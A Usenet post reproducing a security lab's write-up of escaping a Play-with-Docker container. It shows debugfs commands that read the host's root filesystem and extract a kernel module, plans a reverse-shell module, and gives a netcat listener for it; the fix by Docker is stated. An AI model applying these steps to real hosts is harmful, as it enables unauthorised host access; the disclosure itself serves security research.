docker and vms are not a safety measure

Path: i2pn2.org!rocksolid2!def5!POSTED.localhost!not-for-mail
From: 654...@anon.com (654643)
Newsgroups: rocksolid.shared.security
Message-ID: <153a3d7e0d58d3f25f838b41f8dccb73@def4>
Subject: docker and vms are not a safety measure
Date: Wed, 16 Jan 2019 18:45:52 +0000
Organization: def5
In-Reply-To:
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 8bit

As illustrated here again:

https://www.cyberark.com/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host/

Play-with-Docker (PWD), Docker's playground website, allows beginners to run Docker commands in a matter of seconds. Built on a number of hosts, each running multiple students' containers, it is a great place to learn Docker. PWD provides the experience of having a free Alpine Linux virtual machine in a web browser, where students can build and run Docker containers and experience Docker firsthand without having to install and configure it first.

This unique offering was warmly welcomed by DevOps practitioners, drawing more than 100,000 monthly site visits; Docker tutorials, workshops and training are available there as well. The initiative originated with Marcos Nils and Jonathan Leibiusky, aided by the Docker community and sponsored by Docker.

CyberArk Labs set out to escape the mock container and run code on the Docker host.

The impact of a container escape is similar to that of an escape from a virtual machine, as both allow access to the underlying server. Running code on the PWD server would give an attacker unrestricted root access to the PWD infrastructure on the one hand, and to all the students' containers on the other. Escaping a container may be regarded as the first step of an attack against an enterprise infrastructure: many enterprises run public-facing containers nowadays, and such an escape may lead attackers into the enterprise network.

Our findings were reported to Docker and the PWD maintainers, who subsequently fixed PWD.

This is our story[i].

Virtual Machines or Linux Containers

Containers and virtual machines (VMs) both provide a way to isolate applications from the underlying host and from other applications running on the same machine. This isolation is important for application execution and crucial for security.

An important distinction between a Linux container and a VM is its relation to the Linux kernel. As Image 1 shows, each VM loads its own kernel: a VM runs not only a virtual copy of all the hardware (provided by the hypervisor), but also a full copy of a Linux kernel.

In contrast, all containers share the same kernel code. This is what makes containers so lightweight and easy to manipulate, but it is also a weak link in the Linux containers chain. In this blog post we attack that weak link.

Image 1: VMs vs Containers Virtualization Layers. Source: https://www.electronicdesign.com/dev-tools/what-s-difference-between-containers-and-virtual-machines
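
A quick way to observe this kernel sharing for yourself, assuming a local Docker installation (the image and kernel version here are just examples), is to compare kernel versions inside and outside a container:

$ uname -r                          # kernel on the host
4.4.0-96-generic
$ docker run --rm alpine uname -r   # the very same kernel inside a container
4.4.0-96-generic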


Know Thy Enemy

The first step when approaching a container is to chart its borders:

[node1] $ uname -a
Linux node1 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 Linux

The ‘uname’ command prints out the host’s kernel version, architecture, hostname and build date.

[node1] $ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-4.4.0-96-generic root=UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c ro
console=tty1 console=ttyS0 earlyprintk=ttyS0 rootdelay=300

This cmdline pseudo-file on the /proc filesystem tells us the kernel's boot image and the root UUID, i.e. the UUID of the device mounted as the host's root filesystem. The next step is locating the device behind this UUID:

[node1] $ findfs UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c
/dev/sda1

We can now try to mount this device inside the container and, if successful, access the host’s filesystem:

[node1] $ mkdir /mnt1
[node1] $ mount /dev/sda1 /mnt1
mount: /mnt1: cannot mount /dev/sda1 read-only.

Unfortunately, we cannot mount the sda1 device from inside the container, not even read-only. This restriction is most likely enforced by the PWD AppArmor profile.
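
If the container is allowed to read the kernel ring buffer, one way to test the AppArmor theory is to look for denial messages right after the failed mount; a sketch (on PWD, dmesg access may itself be restricted):

[node1] $ dmesg | grep -i 'apparmor.*denied'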

The next thing we can do is dump the cpuinfo file in the proc fs:

[node1] $ cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2673 v4 @ 2.30GHz
stepping : 1
microcode : 0xffffffff
cpu MHz : 2294.670
cache size : 51200 KB
physical id : 0
siblings : 8
core id : 0
cpu cores : 4
apicid : 0
initial apicid : 0
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology eagerfpu pni pclmulqdq vmx ssse3 fma cx16 pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch tpr_shadow vnmi ept vpid fsgsbase bmi1 hle avx2 smep bmi2 erms invpcid rtm rdseed adx smap xsaveopt
bugs :
bogomips : 4589.34
clflush size : 64
cache_alignment : 64
address sizes : 44 bits physical, 48 bits virtual
power management:

---- snip ----

processor : 7
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2673 v4 @ 2.30GHz
.......

We kept studying the container environment (note that the 'hypervisor' flag in the cpuinfo output above already hints that the host is itself virtualized) and also found that the host's underlying hardware is[ii]:

Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS 090007 06/02/2017
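
Such hardware identification can typically be pulled from the kernel ring buffer or from the DMI entries under sysfs; a sketch, assuming those interfaces are readable from inside the container:

[node1] $ dmesg | grep -i 'dmi:'
[node1] $ cat /sys/class/dmi/id/sys_vendor /sys/class/dmi/id/product_name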

There is one more thing to do before we decide on our next step, and that is to use debugfs.

Debugfs is an interactive file system debugger for ext2/3/4 file systems. It can read and write ext file systems designated by a device. Let's try debugfs with the sda1 device:

[node1] $ debugfs /dev/sda1
debugfs 1.44.2 (14-May-2018)
debugfs:

Good! We’ve penetrated the host’s root file system on the sda1 device. By using standard Linux commands, such as ‘cd’ and ‘ls’, we can now look deeper into the host’s file system:

debugfs: ls
2 (12) . 2 (12) .. 11 (20) lost+found 12 (12) bin
181 (12) boot 193 (12) dev 282 (12) etc 2028 (12) home
6847 (20) initrd.img 2030 (12) lib 4214 (16) lib64
4216 (16) media 4217 (12) mnt 4218 (12) opt 4219 (12) proc
4220 (12) root 4223 (12) run 4226 (12) sbin 4451 (12) snap
4452 (12) srv 4453 (12) sys 4454 (12) tmp 4455 (12) usr
55481 (12) var 3695 (16) vmlinuz 3529 (12) .rnd 2684 (36) -
17685 (24) initrd.img.old 24035 (3696) vmlinuz.old

This seems to be the host’s root directory structure. The number before each entry is its inode. For example, the root directory (..) corresponds to inode 2, and the /etc directory has inode 282.
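
debugfs can also address inodes directly; its stat command prints an inode's metadata, and the -R option runs a single request non-interactively. A sketch against the same device, using the /etc inode found above:

[node1] $ debugfs -R 'stat <282>' /dev/sda1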

Armed with this information we can plan our next steps:

Plan A:

Our main goal is to run our code on the host of the container we are in. To do that, we may attempt to load a Linux kernel module that manipulates the kernel into running our code.
To load a new kernel module, we would usually need to compile it against the exact same kernel source code, kernel configuration and toolchain. We can't achieve that for the PWD kernel[iii], so we turn to Plan B.
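
For contrast, the standard out-of-tree module build that PWD denies us looks roughly like this (probe.c and its one-line Makefile are hypothetical; the headers package name is Debian/Ubuntu-style):

$ apt-get install linux-headers-$(uname -r)
$ echo 'obj-m += probe.o' > Makefile
$ make -C /lib/modules/$(uname -r)/build M=$PWD modules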

Plan B:

Plan B is to use a module already loaded on the target kernel to help us build our own modules, which will be loadable on the PWD kernel.
Once we have the target module, we need to compile and load a first, 'probing' kernel module. This module would use printk to dump to the kernel log the information necessary for loading a second, reverse-shell module.
Running that second module on the target kernel would execute the code needed to establish a reverse shell from the PWD host to our command and control center.
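
On the receiving side, the command and control center only needs something listening on an agreed port; a minimal sketch using netcat (flag syntax varies between netcat variants, and port 4444 is arbitrary):

attacker $ nc -lv 4444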

Sound complicated? It's actually not, if you are familiar with Linux kernel modules; in any case, you can skip the technical parts and jump directly to the video if you prefer.


Stage 1: Obtain a Play-with-Docker Kernel Module

With the help of the debugfs application, we were able to roam the host's filesystem with ease. Pretty soon we found a kernel module meeting the minimum requirement for our tactic to work: it uses the printk kernel function.

debugfs: cd /lib/modules
debugfs: ls
3017 (12) . 2030 (48) .. 262485 (24) 4.4.0-96-generic
524603 (28) 4.4.0-137-generic 2055675 (3984) 4.4.0-138-generic

This is a listing of the device's /lib/modules directory structure; the number before each entry is the file's inode. The directory contains three different kernel versions. We need 4.4.0-96-generic.

debugfs: cd 4.4.0-96-generic/kernel/fs/ceph
debugfs: ls
1024182 (12) . 774089 (36) .. 1024183 (4048) ceph.ko

Next, we extract the ceph.ko[iv] file, a loadable kernel module for the Ceph storage platform. Any other module on the host that uses the printk function would serve our cause just as well.

debugfs: dump <1024183> /tmp/ceph.ko

The debugfs dump command extracts a file, addressed by its inode, from the filesystem being debugged (the host's root filesystem) to the container's local /tmp directory.

Now we can transfer this file to our workstation.
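
Back on the workstation, we can confirm the module really references printk: a .ko file is a relocatable ELF object, so its unresolved imports show up as undefined symbols (the 'U printk' line below is the expected output on this 4.4 kernel):

$ nm -u ceph.ko | grep -w printk
                 U printk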


Stage 2: Create the ‘Probing’ Kernel Module

Generally speaking, a module compiled against one kernel source tree will not load on a kernel built from another. However, for relatively simple modules, a module can be loaded on a different kernel under three conditions:

The module must use the kernel's matching vermagic. Vermagic is a string identifying the version of the kernel against which the module was compiled.
Every function call or kernel structure used by the module (symbols, in Linux kernel jargon) must report a CRC matching the one in the kernel it is being loaded into.
The module's starting relocatable address, the one the kernel executes, must be in line with the address the kernel expects.
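
The first condition is easy to inspect: modinfo reports the vermagic string embedded in a module, which must match what the target kernel expects. A sketch against the extracted module (the output shown is illustrative):

$ modinfo -F vermagic ceph.ko
4.4.0-96-generic SMP mod_unload modversions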

